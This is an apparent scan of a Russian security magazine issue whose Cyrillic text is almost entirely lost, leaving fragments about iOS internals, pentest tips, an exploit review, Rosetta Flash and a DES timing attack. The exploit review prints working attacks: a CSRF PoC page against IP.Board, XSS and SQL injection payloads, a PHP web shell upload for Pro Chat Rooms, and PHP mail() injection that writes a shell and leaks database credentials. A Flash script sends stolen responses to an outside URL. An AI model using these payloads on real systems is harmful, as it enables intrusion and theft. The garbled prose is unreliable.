Darwin, APSL, 2001
MacOS X 10.0, .
Darwin , 2007-, , .


NeXTSTEP.
,
OS X/ iOS

XNU DARWIN
OS X / iOS : XNU,
POSIX ( /)
NeXTSTEP, , API
. Darwin , OS X. iOS-,
ARM -

Darwin

,
( ,
iOS ).
Darwin UNIX- , POSIX API, , , UNIX-.
FreeBSD
- Arch Linux, UNIX-, ,

GNOME KDE.
Darwin XNU, , , Mach -

Other Darwin Libraries


libSystem.B.dylib
libc.dylib

libm.dylib

...
Kernel/User Transition

Mach Traps
(mach_trap_table)
loKit

BSD System calls


(sysent)
Scheduling

IPC

VM

Scheduling

IPC

VM

Security

VFS
/dev

BSD

loKit
Mach

Mach Abstractions
ml_*APIs
Hardware

Platform Expert

10 /189/ 2014

53

FreeBSD, ,
( VFS).
Mach FreeBSD, OS X API
, I/O Kit
C++, - ,
.
iOS XNU, , iOS , , Apple, . ,
,
.
XNU, ( + /) /System/
Library/Caches/com.apple.kernelcaches/kernelcache
.
Darwin UNIX/
BSD,
(libc, libmatch, libpthread ),
, (bash, tcsh ksh) , launchd SSH-. ,
, /System/
Library/LaunchDaemons/ssh.plist. , , .
Darwin , , , OS X / iOS.

iOS Apple

INFO
Mac OS X iOS
Mach-O,

,

.

Darwin Mac OS / iOS,


(, / , , ). , ,
, API

Mac OS iOS ,
( AddressBook) OpenGL (GLKit). Cocoa API,

INFO

, API Mac OS iOS

.


API,
jailbreak-

.

,
. iOS Cocoa Touch .
. iOS.
AssetsLibrary,
, CoreBlueTooth, , iAd,
.
, Apple iOS Mac
OS , , ,
CoreMedia, iOS.

/System/Library/Frameworks/.
,
(boundle), ( ), ,
API, ( dylib) .
.
, , , , , .
iOS-
iOS 7 . , iOS 6,
, iOS 6.

SPRINGBOARD
, .
, , SpringBoard ( iOS), ( ). ,
(
, Quartz Compositor), .
SpringBoard , ,
,
,
( iOS 7). -

X-Mobile

54

10 /189/ 2014

,
. OS X,
-
(Finder, Dashboard, LaunchPad ), iOS
,
,
SpringBoard.
iOS,
/Applications, SpringBoard
/System/Library/CoreServices/.
,
/System/Library/SpringBoardPlugins/. , , , NowPlayingArtLockScreen.
lockboundle,
,
IncomingCall.serviceboundle, .
iOS 6 SpringBoard :
BackBoard, , ( HAL). BackBoard
, , , ,
, ,
.
SpringBoard BackBoard iOS, , - ,

.
Android, ,
, (

).

,
, 1988
4-2-2-2-4, . GUID ,

(sandbox).

SANDBOX

INFO

iOS
.
. UNIX chroot,
TrustedBSD MAC,
,
.
sandbox
:
.
Media Library Media/DCIM/, Media/Photos/, Library/
AddressBook/, Library/Keyboard/ Library/Preferences/.
(
).
(
Cocoa API ).
( Jatsam).

iOS
XNU Winocm kernel,


Darwin,
ARM.

WWW
Darwin,
:
puredarwin.org

. iOS
()
, iTunes.
, , . ,
, Mach-O.

/Applications/. iOS
;
. , iTunes, ,
/var/mobile/Applications/ ,

sandbox-
( ) container
. , , ,
. ( MobileMail),
, ,
Library/. SpringBoard,
.
,
, , AFC, , .


Darwin :
gnu-darwin.sf.net

iBoot:
goo.gl/l1SsNU

sandboxd

Sandboxed process
10.

User mode

System calls and Match traps

Kernel mode

1.
2.

3. A

Mandatory access control (MAC) layer


9.
4.

,A

, A

Additional policy modules


8.

5.

sandbox
7.

6.

AppleMatch

10 /189/ 2014

55

sandbox-
/System/Library/Sandbox/Profiles/*
, Scheme.
, , entitlement. ,
, ( ).
, , :

# cat -tv /Applications/MobileSafari.app/


MobileSafari | tail -31 | more
.
( ) , sandbox,
.
iTunes
(: , iTunes) iOS
.

.
Apple, . Sandbox . Safari ,
.

Apple. ,
jailbreak sandbox (,
).

iOS
. , ,
. Android iOS

. API, ,
.
API iOS 4 ( ) .
( iOS 7) Background API
:
;
VoIP-;
;
push-;
;
;
( Bluetooth);
( iOS 7).

INFO

iOS
HFSX.
HFS+ Mac OS X

.

INFO
launchd

SystemD,
Red Hat Linux-.

INFO
XNU
Mach.


,
, Android. Apple
,
,
, Wi-Fi-
.

1. Boot ROM.
,
. LLB.
2. Low Level Bootloader (LLB).
LLB, , iBoot,
. . LLB NAND-

.
3. iBoot. . , NAND-,
. iBoot UART,
, COM- USB ( USB UART).
4. ,
launchd.
5. Launchd, iOS Mac OS X,
,
/ (, backupd, configd,
locationd), , ,
SpringBoard. iOS Mac OS X launchd /bin/init UNIX,
.
6. SpringBoard. !
chain
of trust,
.
LLB, iBoot , ,
.
.
Boot ROM, 2014 iBoot.
iPhone,
iBoot (Recovery), iOS, iTunes.
OTA- , DFU (Device Firmware
Upgrade), Boot
ROM : iBSS iBEC.
, LLB iBoot, , .

iOS

Recovery Mode

, NeXTSTEP
,
.
Google, , Android
iOS, : Android iOS.
, ,
.

Recovery

LLB

INFO

root iOS alpine.

iPhone.

Boot ROM

DFU?

iBoot

Kernel

OS Upgrade
(iTunes)
iBSS

iBEC

Update

EASY
HACK

56

10 /189/ 2014

GreenDog ,
Digital Security
agrrrdog@gmail.com,
twitter.com/antyurin

WARNING

. ,

,
.

. - . .
( ), .
, , . ,
, .


, , . -, .
: ,
Burp Comparer.
SNMPv3. . , SNMPv3 , . -

10 /189/ 2014

57

Easy Hack

, ,
SNMPv3 ,
, MIB,
.
- Python
Patator (goo.gl/3C0hbQ)
Ruby (goo.gl/PSD69c).



. , .
.
.
OpenSSH SSH- . (4, 5 6) time-based

. .
,
,
30 .
. ,
, OpenSSH
.
, , ,
,
. , ,
(
-), .
,
OWA Outlook Web App. .
-,
- .
.
, , ,
OSUETA (goo.gl/3gk51d) , , . 113
.
. , . OWA
, ( CPU).
. , , ,
, ,
/ OpenSSH, .
.

, :
- . Heartbleed. , . NSA , , :). ,
, OpenSSL,
- . ,
, ()
- HTTPS FTP SSL, .
, , , , , ,
,
, , . SSL. SSL:
SSL-,
( HTTPS). , SSL-
. , SMTP.
25- ; ; EHLO,
SSL-, STARTTLS ( , , ) SSL-.
SSL- .
, MITM (
,
),
SSL, .
SSL-, ,
( HTTP 80, HTTPS 443). , SMTP, , MTA, ( MTA), STARTTLS
.
. (
), , Heartbleed, ,
, -

. SMTP, POP3, FTP, ,


SSL-, ,
STARTTLS. -
Heartbleed.
. , Nmap
Heartbleed SSL-, . , Metasploit (auxiliary/scanner/
ssl/openssl_heartbleed) GitHube (goo.gl/sgwaa3)
STARTTLS.

STARTTLS EHLO- SSL

SMTP- Heartbleed. :)

58

I I

10 /189/ 2014

DR ID

SSL. , , ,
SSL , ,
. , . , ( , ),
. ,
.

() . , . , , . ,
,
( ).
, , ... . , , , , , . , ? , . SSL- www.google.com
HTTPS-. ,
, ( ,
).
,
- ... , (
) , ( - ),
.
, SSL pinning ( certificate
pinning). :
,
. -

, . , ,
, .
(
) . ,
. - , , / . ,
.
, , ,
. , iOS Windows Phone
SSL pinning App Store, Market.
SSL- - .
? ( , , ). . .
. 2012
Black Hat USA iSEC Partners,
(Justine Osborne) (Alban Diquet), Android-SSL-TrustKiller (goo.gl/p43AYi) iOS SSL Kill Switch (goo.gl/
wR8baO).
. / Java Debug Wire Protocol / MobileSubstrate API, SSL,
. ,
certificate pinning,
, . ,
. (goo.gl/9Wr5YA) : goo.gl/Dm3DN5.
, :)

.
,

, IP,
. , ,
. , IP-
FTP-.
. SSRF.
, .
, , - : PORT IP ,
.
ftp-bounce
Nmap.

? :) , FTP Port Bounce ( 1997 ),


, .
, FTP (
). 21- ,
( -),
PORT IP- .
. (21- )
( ),
. , .

Easy Hack

10 /189/ 2014

59

, PRNG
(Pseudorandom number generator), .
, ,
.
,
. - ,
- .
. ,
- , , , , . ,
, :).
, . PRNG .
. , ?
Positive Hack Days (goo.gl/4xuICf)
(, ) , java.util.Random ( PRNG)
. , .
, Jenkins ( -). MD5- IP, , , java.util.
Random ( ).
.
, , .
, , PRNG,
. , (. Entropy ). : HTTP -, TCP/
IP- ( . ). , .
PRNG, , , - ,
IP-.
, .
, , , , .
.
. , .
. ,
.
2008 Debian, OpenSSL.
2006 , Debian Valgrind Purify.
() OpenSSL. ,
OpenSSL
(. ).

( NSA :))

.
, , PID .
1 32 768. ,
sslabs.com

. , ( ) . SSL man in the middle


-
SSH-
. , , ,
, -. RSA-, DSA- exploit-db.com (exploit-db.com),
SSH (goo.gl/ryWxCv) , SSL
www.ssllabs.com (+ -).
,
. , .
!

60

10 /189/ 2014

,
b.ryutin@tzor.ru,
@dukebarman


- . , -
PHP- Zend Framework.

RF- I

RD

CVSSv2: N/A
: 3 2014
: Piotr S (@evil_xorb)
CVE: N/A
IPB
, CSRF-
.
,
. ,
- , . ()
GET- , -

,
.
.
:

http://community.invisionpower.com/index.php?
sharelink=print;aHR0cDovL2NvbW11bml0eS5pbnZpc2l
vbnBvd2VyLmNvbS9mb3J1bS5waHA/aWQ9MjMzNQ==
, Base64-. :

http://community.invisionpower.com/forum.php?id=23
. -

10 /189/ 2014

61


, .

http://community.invisionpower.com.your_domain.pl
, , :

Location: http://community.invisionpower.com.
xorb.pl/exploit.html?forcePrint=1&_k=
161cc4d2d5503fdb483979f9c164b4d3
$_GET _k .
. .

EXPLOIT
:

http://forum.victim_site.com.your_domain.pl
exploit.html :

<html>
<head>
<script>
onload = function ipboard(){var token =
window.location.hash.split('=');
document.getElementById('tokens').value=token;};
function fo(){document.ipboards.submit();};
setTimeout("fo()",1500);
</script>
</head>
<body>
<form action="http://forum.victim_site.com/index.
php?" method="POST" id="ipboards" name="ipboards"
enctype="multipart/form-data">
<input type="hidden" name="TopicTitle"
value="hacked!" />
<input type="hidden" name="isRte" value="0" />
<input type="hidden" name="noSmilies" value="0" />
<input type="hidden" name="Post"
value="IPboard 3.x 0day" />
<input type="hidden" name="ipsTags"
value="&#13;" />
<input type="hidden" name="enableemo"
value="yes"/>
<input type="hidden" name="enablesig"
value="yes" />
<input type="hidden" name="st" value="0" />
<input type="hidden" name="app" value="forums" />
<input type="hidden" name="module" value="post" />
<input type="hidden" name="section"
value="post" />
<input type="hidden" name="do"
value="new&#95;post&#95;do" />
<input type="hidden" name="s" value="x" />
<input type="hidden" name="p" value="0" />
<input type="hidden" name="t" value="&#13;" />
<input type="hidden" name="f" value="2" />
<input type="hidden" name="parent&#95;id"
value="0" />
<input type="hidden" name="attach&#95;post&#95;
key" value="x" />
<input type="hidden" id="tokens"
name="auth&#95;key" value="7xxx3e9" />
<input type="hidden" name="removeattachid"
value="0" />
<input type="hidden" name="dosubmit"
value="Post&#32;New&#32;Topic" />
<input type="submit" value="Submit request" />

</form>
</body>
<h1><b>IP Board 3.X PoC<br/>wait... ;)</b></h1>
</body>
</html>



IP.Board

,
:

http://community.invisionpower.com/index.
php?sharelink=print;aHR0cDovL2ZvcnVtLnZpY3RpbV9
zaXRlLmNvbS55b3VyX2Rvbpbi5jb20vZXhwbG9pdC5od1sIw==
Base64- ...print; :

http://forum.victim_site.com.your_domain.com/
exploit.html#
.
(bit.ly/1lPCOm3) .

TARGETS
IP.Board 3.x3.4.6.

SOLUTION
.


R
R
0
CVSSv2: N/A
: 5 2014
: Mike Manzotti
CVE: N/A
Text
Chat Room Audio/Video Chat Room (v8.2.0)
Prochatrooms.com. PHP AJAX
.
(, ), IRC.
.

EXPLOIT
1. XSS. ,
, JavaScript-. :

WARNING


. ,

,
.

62

POST: http://<WEBSITE>/prochatrooms/
profiles/index.php?id=1
Content-Disposition: form-data;name=
"uploadedfile"; filename="nopic333.jpg"
Content-Type: image/jpeg
<script>alert(document.cookie)</script>
32- HTML- imgID:

<input type="hidden" name="imgID"


value="798ae9b06cd900b95ed5a60e02419d4b">
/profiles/
uploads, :

http://<WEBSITE>/prochatrooms/profiles/uploads/
798ae9b06cd900b95ed5a60e02419d4b
2. XSS. edit :

http://<WEBSITE>/prochatrooms/profiles/
index.php?id=1&edit="><script>
alert(document.cookie)</script>
3. SQL-. , /includes/
functions.php.

...
$params = array(
'password' => md5($password),
'email' => makeSafe($email),
'id' => $id);
$query = "UPDATE prochatrooms_users
SET email = '".$email."', password='".
md5($password)."' WHERE id = '".$id."'";
...
$query = "UPDATE prochatrooms_users SET email =
'".$email."' WHERE id = '".$id."'";
...
$query = "UPDATE prochatrooms_users
SET active = '".$offlineTime."', online = '0'
WHERE username = '".makeSafe($toname)."'";#
, - . makeSafe. htmlspecialchars():

10 /189/ 2014

POST http://<WEBSITE>/prochatrooms/profiles/
index.php?id=1
Content-Disposition: form-data; name=
"profileEmail" mm () 1dn eu', email=
(select load_file('/var/www/prochatrooms/includes/
db.php')) where id ='1';#
4. .
XSS SQL-, -
.
:

POST: http://<WEBSITE>/prochatrooms/profiles/
index.php?id=1
Content-Disposition: form-data; name=
"uploadedfile"; filename="m.jpg"
Content-Type: application/octet-stream
<?php system($_GET[cmd]);?>
, :

<input type="hidden" name="imgID" value=


"82d0635538da4eac42da25f8f95f8c45">
:

POST http://<WEBSITE>/prochatrooms/profiles/
index.php?id=1
Content-Disposition: form-data; name=
"profileEmail" mm () 1dn eu' where id ='1';
SELECT load_file('/var/www/prochatroms/profiles/
uploads/82d0635538da4eac42da25f8f95f8c45')
INTO OUTFILE '/var/www/prochatrooms/profiles/
uploads/s.php';#
,

http://<WEBSITE>/prochatrooms/profiles/uploads/
s.php?cmd=id:uid=33(www-data) gid=33(www-data)
groups=33(www-data)
Google, ,
:

intitle:"Powered by Pro Chat Rooms"

TARGETS
Pro Chat Rooms 8.2.0.

...
function makeSafe($data)
{
$data = htmlspecialchars($data);
return $data;
}
...
SQL-, email,
, , MD5- .

POST http://<WEBSITE>/prochatrooms/profiles/
index.php?id=1
Content-Disposition: form-data; name=
"profileEmail" mm () 1dn eu', email=
(select adminLogin from prochatrooms_config)
where id ='1';
, . :

SOLUTION
.



-
I
CVSSv2: N/A
: 8 2014
: geoffrey
CVE: N/A
, -, (bit.
ly/1u38llY). . PHP- mail().
. :
1. To.
2. Subject.
3. Message.

10 /189/ 2014

63

:
1. Headers (Optional).
2. Parameters (Optional).
.
. PHP ,
sendmail, . PHP
4.2.3.
sendmail.
:
-O option=value
option.
.
-Cfile
.
Sendmail (set-user-ID or set-groupID), .
-X logfile

.
:
QueueDirectory=queuedir
.
:

$to = 'a@b.com';
$subject = 's';
$message = 'm';
$headers = '';
$options = '-arg val';
mail($to, $subject, $message, $headers, $options);

gdb. php
:

(gdb) file php


Reading symbols from /opt/php-5.3.0/sapi/cli/
php...done.
(gdb) set args -r 'mail("a@b.com", "s", "m", "",
"-arg val");'

EXPLOIT
:

$to = 'a@b.c';
$subject = '<?php system($_GET["cmd"]); ?>';
$message = '';
$headers = '';
$options = '-OQueueDirectory=/tmp -X/var/www/
html/rce.php';
http://localhost/rce.php :

11226 <<< To: a@b.c


11226 <<< Subject: 11226 <<< X-PHP-OriginatingScript: 1000:mailexploit.php
11226 <<<
,
, , :

> cat
11226
11226
11226

rce.php
<<< To: a@b.c
<<< Subject: <?php system($_GET["cmd"]); ?>
<<< X-PHP-Originating-Script: 1000:
mailexploit.php
11226 <<<
http://localhost/rce.php?cmd=ls%20
-la:

11226 <<< To: a@b.c


11226 <<< Subject: total 20
drwxrwxrwx 2 * * 4096 Sep 3 01:25 .
drwxr-xr-x 4 *** www-data 4096 Sep 2 23:53 ..
-rw-r--r-- 1 * * 92 Sep 3 01:12 config.php
-rwxrwxrwx 1 * * 206 Sep 3 01:25 mailexploit.php
-rw-r--r-- 1 www-data www-data 176 Sep 3
01:27 rce.php
11226 <<< X-PHP-Originating-Script: 1000:
mailexploit.php
11226 <<<
11226 <<<
11226 <<<
11226 <<< [EOF]
.
-C:

(gdb) b mail.c:291
Breakpoint 1 at 0x83f39b2: file /opt/php-5.3.0/
ext/standard/mail.c, line 291.(gdb) r
Starting program: /opt/php-5.3.0/sapi/cli/
php -r 'mail("a@b.com", "s", "m", "","-arg val");'
[Thread debugging using libthread_db enabled]
Breakpoint 1, php_mail (to=0x8b5c2b8 "a@b.com",
subject=0x8b5c2ec "s", message=0x8b5be2c "m",
headers=0x8b5be9c "", extra_cmd=0x8b5c31c
"-arg val")
at /opt/php-5.3.0/ext/standard/mail.c:291291
sendmail = popen(sendmail_cmd, "w");
:

(gdb) p sendmail_path
$1 = 0x89af284 "/usr/sbin/sendmail -t -i"
(gdb) p sendmail_cmd
$2 = 0x8b5c35c "/usr/sbin/sendmail -t -i -arg val"
-arg val -
;ls -al - ,
.
.

$options = '-C/var/www/html/config.php
-OQueueDirectory=/tmp -X/var/www/html/evil.php';
mail($to, $subject, $message, $headers, $options);
evil.php :

11124 >>>
unknown
11124 >>>
unknown
11124 >>>
unknown
11124 >>>
unknown
11124 >>>
unknown
11124 >>>

/var/www/html/config.php: line 1:
configuration line "<?php"
/var/www/html/config.php: line 3:
configuration line "dbuser = 'someuser';"
/var/www/html/config.php: line 4:
configuration line "dbpass = 'somepass';"
/var/www/html/config.php: line 5:
configuration line "dbhost = 'localhost';"
/var/www/html/config.php: line 6:
configuration line "dbname = 'mydb';"
No local mailer defined

, , : .
:
1.
Shared ,
.

64

10 /189/ 2014


, .
2.

. -

-f,
:

-f\'${PHPFROM}\' -OQueueDirectory=/tmp -X /
var/www/uploads/back.php
PHPFROM:

"<?if(isset(\$_SERVERHTTP_SHELL ())
eval(\$_SERVER[HTTP_SHELL]);/*@*/?>"
,
.

TARGETS
-
:

grep -r -n --include "*.php""mail(.*,.*,.*,.*,.*)" *



PHP- Zend (bit.ly/1tIq8jD), , , 2011 .

SOLUTION
mail()
. PHP 5.4 ,
safemode, ,
.

? akep.ru!
group.x

][!

66

10 /189/ 2014

SDLC...

SDLC, , , ( .
. ), . SDLC
, Agile,
.

SDLC


white hat, security, ZeroNights
.
Principal Security
Engineer Nokia,
HERE.
alexey.sintsov@here.com

SDLC (security development life cycle)


, , . ,
.

Microsoft, SDLC.
, , ,
: .
, -
,
. ,
SDLC, (www.microsoft.
com/security/sdl/default.aspx).

AGILE
, Microsoft
,
Waterflow.
, 2006 , (
, ).
, Agile. ,
, -

, ...
, ,
SDLC. , SDLC , , , .
,
,
:
,
, , ,

, . ,
SDLC. Agile
, , , ,
,
(, , Backlog ),
.

SDLC, S.
,
()
,
,
. ,
Agile -

10 /189/ 2014

67

SDLC...

SDLC.

, , .
.


,
, , . , HERE
embedded- , iPhone, - ,
,
! . , ,
. , ,
.

SDLC?
, SDLC
, MS,
. , S ( ,
) SDLC
. . ,
.
!
,
: ,
,
. + , ,
.

()
- .
. ,

, , ? , ,
.
. ,
-
, .
() ,
- .
.
,
. .
-
( ,
,
). ,
,
. , . :
-HackQuest/CTF
, , , , , , .
,
. , Agile

SDLC MS

, .
,
, . : .
, . , ,
.
, , -, .
! ,
(, , )
, (
,
). , :
.
, +
: , ,
SSL ( ,
), / (,
XSS/SQLi
) . ,
,
, : , , CSRF, , :). ,
,
- , -, - .
, ,

:). , Agile ,
.
, , ,
-, , /. , .
, -
- ,
. ,
,
.
-,
. ,
RedTeam ,
( ),



;). ,
, , , , , ,

, .
feedback .


, - ,
, .
, , . ,
, ,
, , .
SDLC ,
. : ,
, , .
:
. .
!

SDLC MS, Agile

10 /189/ 2014

Michele Spagnuolo
@mikispag
miki.it

JSONP
ROSETTA
FLASH

Rosetta Flash
(CVE-2014-4671, CVE-2014-5333) ,
SWF-, ,

JSONP. CSRF-
, JSONP,
Same Origin Policy.

, - . ,

JSONP
( JSON-!)
.
Google, YouTube, Twitter, LinkedIn, Yahoo!, eBay,
Mail.ru, Flickr, Baidu, Instagram, Tumblr Olark
JSONP. - Ruby on
Rails MediaWiki .

marina_ua@shutterstock.com

68

10 /189/ 2014

69


:
1. Flash SWF- GET- POST-,
cookie, , ,
crossdomain.xml.
SWF-
: SWF, ,
, ,
.
2. JSONP callback URL-. JSONP
callback
[a-zA-Z_\.],
,
, .
3. SWF- <object>
Flash, Flash-.
Rosetta Flash zlib, ADLER32 SWF- ,
- ,
JSONP callback
, Flash- .


Rosetta Flash . ,
,
,
, (bit.ly/1D5dyxC).

. 1. Rosetta Flash


SWF ,
zlib,
-

. 2. SWF
. 3. Flash-

FLASH-
Flash- (magic bytes FWS ), zlib (CWS)
LZMA (ZWS). ,
. 2.
, -
( Version
FileLength). , , .

. 4.
zlib

ZLIB
zlib- zlib -. , zlib-,
DEFLATE, ,
. (bit.ly/YGzHD3),
zlib- :
0
1
+---+---+=====================+---+---+---+---+
|CMF|FLG|...compressed data...|
ADLER32
|
+---+---+=====================+---+---+---+---+

WWW

bit. ly/1AHhWPB Rosetta
Flash


ActionScript.
1

, ,
CMF FLG. , CMF (Compression Method and flags),
: , CM [0:3],
, , CINFO [4:7], ,
.
, FLG (Flags), :
[0:4] FCHECK;
5 FDICT;
[6:7] FLEVEL.
FCHECK (Check bits for CMF and FLG)
, CMF FLG, 16-
, MSB- (CMF*256+FLG),
31.
FDICT (Preset distionary) ,
FLG- zlib- DICT. , FDICT 0 (-
DICT ).
FLEVEL (Compression level) ; , , 3 (11 ), .
. , 4

70

10 /189/ 2014

. 5.
zlib
. 6.
ADLER32

CMF + CINFO + FLG (


FCHECK CMF FLG,
; FDICT, 0, , 3).
, , 0x68 0x43 = hC Rosetta Flash
. 0x6842 = 26691 mod 31 = 0,
FCHECK.

. 7.

. 8.
DEFLATE-

ADLER32
SWF-
(. . 2), ,
zlib- SWF ,
- ,
. Rosetta Flash ,
ADLER32
SWF-,
[a-zA-Z0-9_\.].
ADLER32 , S1 S2, .
. 6.
S1 S2 ( -). :
,
SWF? , SWF :
. .
? Sleds + Deltas
(. . 7).
, ( 0xfe, 0xff ,
) , ,
S1,
-.
. , S1,
. NULL-,
S2,
S2.

WARNING

. ,

,
.

INFO
Rosetta Flash
Pwnie Award
Internet Bug Bounty.

SWF-

-

-
zlib,

,
[a-zA-Z0-9_\.]
. Rosetta .
8


.

,
,

, . , (
16, 00) , .
. 9.

,
, . SWF-.
ActionScript 2.0 ( open source mstsc):

class X {
static var app : X;
function X(mc) {
if (_root.url) {
var r:LoadVars = new LoadVars();
r.onData = function(src:String) {
if (_root.exfiltrate) {
var w:LoadVars = new LoadVars();
w.x = src;
w.sendAndLoad(_root.exfiltrate,
w, "POST");
}
}
r.load(_root.url, r, "GET");
}
}
static function main(mc) {
app = new X(mc);
}
}
SWF-
Rosetta Flash. - ( ,
) . 10.
HTML-
crossdomain.xml , , .
, FlashVars (. . 11):
url URL , , GET- cookies ;
exfiltrate URL,
POST x, .

10 /189/ 2014

71

.
ADOBE
Google ( ),
Adobe PSIRT. ,
(bit.ly/1pYS027) ,
Twitter, eBay, Tumblr Instagram.
Adobe ,
- Flash Player 14 (14.0.0.125)
(14.0.0.145).
APSB14-17 Adobe
SWF-:
, , Flash Player
API c JSONP callback.
, . , Flash Player, , Rosetta Flash:
1. 8 .
JSONP , SWF
.
2. Flash 4096 .
, JSONP, SWF .
3. .
, JSONP, [^0-9A-Za-z\._]. ,
$ JSONP callback,
, jQuery JS.
, $ ALLOWED_
CHARACTERS Rosetta Flash JSONP callback (
), .
, Rosetta Flash SWF 4 ,
ADLER32 . , , JSONP .
, ,
: (.
, (, SWF ,
callback SWF, Adobe ( ( callback).
: S1, , ( Sled + Delta
.
Adobe , ,
.
. Adobe 12 2014 . :
1. Content-Type: application/x-shockwave-flash . , .
2. 8 . - >=080
(non-ASCII), .
3. SWF-, 4096
. non-ASCII,
.
4. SWF-
.


, JSONP , , , sandbox-.
HTTP- Content-Disposition:
attachment;
filename=f.txt, . -

, Flash Player
SWF ( 10.2).

//:

response.body =
"//#{param[:callback]}".

10

, Google,
Facebook GitHub .
,

X-Content-Type-Options:
nosniff.
JSONP , application/xshockwave-flash (, application/javascript
application/json), Flash
Player SWF.

11

JSONP
Flash-,
, Same Origin
Policy -.

,
. Rosetta Flash
,
.

, Rosseta ,
,
.
:
Flash-,
, ,
, ,
;
,
Content-Type (
, , Content-Type);
, API,
- callback.

. 9. Rosetta Flash
. 10. SWF Rosetta Flash
. 11.
SWF-

,
ascii-zip,
Rosetta,
Google
Security Team, Adobe PSIRT HackerOne.

72

10 /189/ 2014


roman.korkikian@yandex.com


, .

. ,
.
,
( ), . , .

erandamx@shutterstock.com

10 /189/ 2014

73

WARNING

. ,

,
.

74

10 /189/ 2014



.

.
, , ,
.
,
.
. ,
,


.
,
, . ,
,
. 1. - DES

,

.
,
,

. ,
,
.

, ,

, .

, ,
, (goo.gl/GEszDD).

. ,
, .
, , , ( - ?), , , .
,
-

. 2.

.
,
(
, ?),
.

(hardware attacks),
.
,
, .
,
, ,
. ,
,
,
(Side Channel Attacks).
,
,
.

.
, , ,
. ,
?

, , , ,

.
,
,
.

(Fault attacks).

: ,
,
-.


DES, C++ (
. 1, ). , ,
,
. ,
,
.

75

10 /189/ 2014


, (Timing
attack)
DES.
dvd.xakep.ru,
(
. 2), .

:
. 3. 1

define ETBIT(x,i)
((x>>(i))
0x1)
uint8_t p_tab 32 = 16,7,20,21,29,12,28,1 ,1,
15,23,26,5,18,31,10,2,8,24,14,32,27,3,9,19,13,
30,6,22,11,4,25};
uint32_t ES_P(const uint32_t var)
int iBit = 0;
uint32_t res = 0x0, one = 0x1;
for (iBit=0; iBit<32; iBit )
if ( ETBIT(var,32 - p_tab iBit ) == 1)
res = one<<(31-iBit);
return res;
}

:
res = one<<(31-iBit),
(: ),
var 1. var,
, , ,
,
. , ,
.
, , .

,
,

:
1=0x3030456 89 BC EF,
2=0xFE CB 98 6540303,
.
, ,
,

ES_P
.
,
,


.
?

,
var , :
,
DES_P,
var
: a*( W(var)),
,

, res
= one<<(31-iBit), W(var)
,
var, 1.
,
16 ;
,
, .

, t
= a*( W(var))
T. a T , ,
, . t . ,
var .
, , ,
:
W(var)
. ,
W(var) . , ,
, .
(. 3).
,
1
2 ( ). ,
,


.
var ,


1.
, 2.
,

1.
, 1
.
, ,
, .
, -


:
res |= one<<(31-iBit),
(:
),
var 1

76


,
.

. 4.



, ,

.
,
, ,


. (b, c) 0
(
b, c). b

. ( -
c). ?
, ,
:

void

ame(int * b, int * )
static int
= 0;

. 6.

10 /189/ 2014

int
= 1000;
srand((unsigned int)rdtsc());
if ( ==0)
= 1 rand() 100;
* b =
( * *rand()) ;
* = ( * *rand()) ;
void uess()
int b, , i, nTries = 100000;
double avg1 = 0.0, avg2 = 0.0;
for (i=0; i<nTries; i )
ame( b, c);
avg1 = b;
avg2 = c;
printf(" f n",
roundf((avg1-avg2)/numTries));
, 1
100, b 0
999, ,
! (
b, ) 100 (,
), .
b
, . . ,
, (
b,
), , .
, .
,

10 /189/ 2014

77

,
. ,
(x)
x
.

,
b c
(b) (c),
b c , (b)
(c)

, ,
(b)
(c)
.

.
. ,
,
W(var):

,


(x) x

,
.
5% . ,
.
? ,
(
). -,
,
. -, , , ( ,
), - .
,
.
DES,
:
,
ES_P,
var: a*( W(var)); -
, W(var) ;
,
;
(t), 0: . , ,
, .
, t = a*( W(var))
T
(t). , . 4, .
, W(var)
254,
327
!

(t) = (a*( W(var))


T
(t)) =
(a*( W(var)))
(T)
( (t)) = a*( W(var))
T
( (t))

, ,
,

,
( (t)) .
. 100 DES,
100 .
:
1=0x3030456 89 BC EF,
2=0xFE CB 98 6540303,
3=0x2030456 89 BC EF,
4=0x3030456 89 BC E . ,

1, 2, 3, 4 , . 5.
.

. 7.

. 5. 2

78

10 /189/ 2014

. 8.


(
),
( , W(var) 234,276 ().
(. 6), , Y
.


. 6? ( 2, 3, 4) , 1 .
-
, , ( (t)) . , ,
1,
. , 1 (
). ,
.
.
, ,

:
, - .
, , ,
pcc(x,y) ( Wiki bit.ly/W WzQ3n).
. , (t) = a*( W(var))

T
( (t)) y = a*x
b,
x ,
y .
. 7.
1
, .
, 1.
.
,
,
( ).
, , ,
1 . , ,
, .
,
.


,
6 . 6 , 64 ( ). 6
,
, , . ?
, , 6 :

10 /189/ 2014

79

,
ES_P, :
4 var
a* W(var 1,1:4 ) (6 4 var);
var 4 a*(
W(var :,1:32 ));
;
(t).

, t = a* W(var 1,1:4 )
a*(
W(var :,1:32 ))
(t).
6 4 var.
32 R E() 48 ,
48 . R , .
(!) 6 , 6
Sbox.
, 32- var,
.
,
W(var 1,1:4 ) ,
:
(t) = (a* W(var 1,1:4 ))
(a*( W(var :,1:32 )))
( )
( (t)) = a* W(var 1,1:4 )
(a*(
W(var :,1:32 )))
( (t)).
W(var 1,1:4 )

W(var :,1:32 ) ( , W(var 1,1:4 ) ,
,
W(var :,1:32 ) ), (a*(
W(var :,1:32 ))) ( , (
W(var :,1:32 ))
254), ,
( (t))!
var
var 1,1:4 = Sbox E( ) 1,1:6 xor
1,1:6 ,
E( ) 1,1:6 6 R
E();
1,1:6
6 ; Sbox Sbox.
var 1,1:4 : (t)
= a* W(Sbox E( ) 1,1:6
xor 1,1:6 )
(a*(
W(var :,1:32 )))
( (t)).

(a*(
W(var :,1:32 ))),
( (t)) ,
.
,


(a*(
W(var :,1:32 )))
( (t))
const: (t) = a* W(Sbox E( ) 1,1:6 xor
1,1:6 )
const.
, 6 -

W(Sbox E( ) 1,1:6 xor


1,1:6 ),
. :

For each key = 0:63


For each i = 1:N
//
P = plaintext(i)
/*
*/
L,
= IP(P)
hw_var i = ammingWeight(
Sbox1(E( ) 0:5 XO key))
/*
var*/
EndFor
/*

N
N

*/
pcc(key) = ComputePearsonCorrelation
(t, hw_var)
EndFor
++ ( dvd.xakep.ru), . 8.
. 000010=2 ,
, , ,
. , , .
6 ,
, .

. ,
.
,

.


000010=2
,
,
, ,

,

//,

.
, ,
, ,
. stay tuned,
.

80

10 /189/ 2014

WARNING
! ! , !

X-TOOLS

D1g1
Digital Security
@evdokimovds


: Simone
Margaritelli & Co
: Android
URL: www.dsploit.net

: iSECPartners
: Windows
URL: https://github.
com/iSECPartners/
DIBF

: Decalage
: Windows
URL: https://
bitbucket.org/
decalage/balbuzard/
wiki/balbuzard

ANDROID

